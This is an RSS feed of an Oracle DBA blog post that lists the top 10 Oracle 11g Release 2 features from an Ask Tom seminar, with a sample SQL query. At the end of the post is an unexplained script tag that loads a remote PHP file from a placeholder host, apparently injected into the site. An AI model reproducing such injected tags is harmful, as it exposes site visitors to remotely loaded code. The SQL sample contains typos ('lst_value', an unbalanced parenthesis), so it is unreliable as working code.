<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; Top 10 of 11g Rel2</title>
	<atom:link href="http://www.bestremotedba.com/tag/top-10-of-11g-rel2/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Top 10 of 11g Rel2 &#8211; Ask Tom Live Seminar at Tokyo,Japan</title>
		<link>http://www.bestremotedba.com/top-10-of-11g-rel2-ask-tom-live-seminar-at-tokyojapan/</link>
		<comments>http://www.bestremotedba.com/top-10-of-11g-rel2-ask-tom-live-seminar-at-tokyojapan/#comments</comments>
		<pubDate>Wed, 10 Feb 2010 07:53:48 +0000</pubDate>
		<dc:creator>mudhalvan</dc:creator>
				<category><![CDATA[11g Rel2 Feature]]></category>
		<category><![CDATA[Ask Tom Live Seminar]]></category>
		<category><![CDATA[Japan]]></category>
		<category><![CDATA[Top 10 of 11g Rel2]]></category>
		<category><![CDATA[Top 10 of 11g Rel2 - Ask Tom Live Seminar at Tokyo]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=554</guid>
		<description><![CDATA[Top 10 of 11g Rel2 - Ask Tom Live Seminar at Tokyo,Japan]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>Dear DBAs<br />
         I have attended Ask Tom Live seminar at Tokyo, Japan about Top 10 of 11g Rel2. This is just only topics. I will update more based on everyday when practically do it one by one. It was an excellent one. Please don&#8217;t miss if you get such an oppertunity in your countries and cities. </p>
<p>1. Parallelism &#8211; By ourself using &#8211; DBMS_PARALLEL_EXECUTE<br />
	DBA View &#8211; DBA_PARALLEL_EXECUTE_CHUNKS<br />
	- Until now it is manually<br />
	-Split by rowid ranges &#8211; This is Best because it will allow us to split with non-overlapping chunk and least contention.<br />
			- split table into N equi-sized,non-overlapping chunks<br />
			- create a job passing in the low and high rowids for each range<br />
			- Job would process &#8220;where rowid between :lo and :hi&#8221;<br />
	- By primary key ranges using NTILE()<br />
	- DBMS_PARALLEL)EXECUTE automates both approaches and makes it easy<br />
2. Analytics &#8211; Coolest thing<br />
	-LISTAGG &#8211; List Aggregate function<br />
		- 9iR2 First did STRAGG<br />
		- 10g used a trick &#8220;sys_connect_by_path&#8221;<br />
		- 11g Rel2 &#8211; it become Simple</p>
<p>		select deptno,<br />
				ename,<br />
				row_number()<br />
				over (partition  by deptno<br />
						order by ename) rn,<br />
				first_value(ename)				&#8211; 1st<br />
				over (partition by deptno<br />
						order by ename) &#8220;1st ename&#8221;,<br />
				nth_value(ename,3)				&#8211; nth<br />
				over (partition by deptno<br />
						order by ename) &#8220;3rd ename&#8221;,<br />
				lst_value(ename)				&#8211; last<br />
				over (partition by deptno<br />
						order by ename<br />
						rows between current row<br />
						and unbounded following))  &#8220;last ename&#8221;<br />
		from emp<br />
	order by deptno,ename;</p>
<p>3. Execute on directory</p>
<p>4. Recursive Subquery Factoring</p>
<p>5. Improved Time Travel<br />
	- Flashback Data Archive</p>
<p>6. Watch File or Directory<br />
	- When files arrive to some directory<br />
		- An event can be generated<br />
		- Code can be invoked to deal<br />
7. Deffered Segment Creation<br />
		- Deferred segement allows us to put off initial extent allocation until the first row created in a segment</p>
<p>8. Flash Cache<br />
		- Reduce I/O bandwidth requirement with Flash Cache</p>
<p>9. Parallel Improved<br />
		- Automated degree of parallelism<br />
		- Parallel statement queuing<br />
		- In-Memory Parallel execution</p>
<p>10. Edition based Redefination</p>
<p><script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/top-10-of-11g-rel2-ask-tom-live-seminar-at-tokyojapan/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

